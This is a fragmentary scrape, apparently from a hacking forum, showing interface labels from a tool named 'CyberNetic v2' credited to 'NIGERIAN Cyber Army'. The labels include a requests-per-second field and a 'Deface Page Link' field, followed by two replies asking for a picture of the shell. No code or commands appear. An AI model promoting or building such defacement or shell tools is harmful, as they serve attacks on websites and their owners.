Ignore Default Templete
Default
Req/s: 
Deface Page Link: 


Go BackCONTROLStatus: Idle...Copyright © NIGERIAN Cyber Army
 
Re: CyberNetic v2 by NCA

nice bro but please take pic of shell :)

 
Re: CyberNetic v2 by NCA

nice bro but please take pic of shell :)
why you're lazy to test yourself ?

DLOQGGX.png


 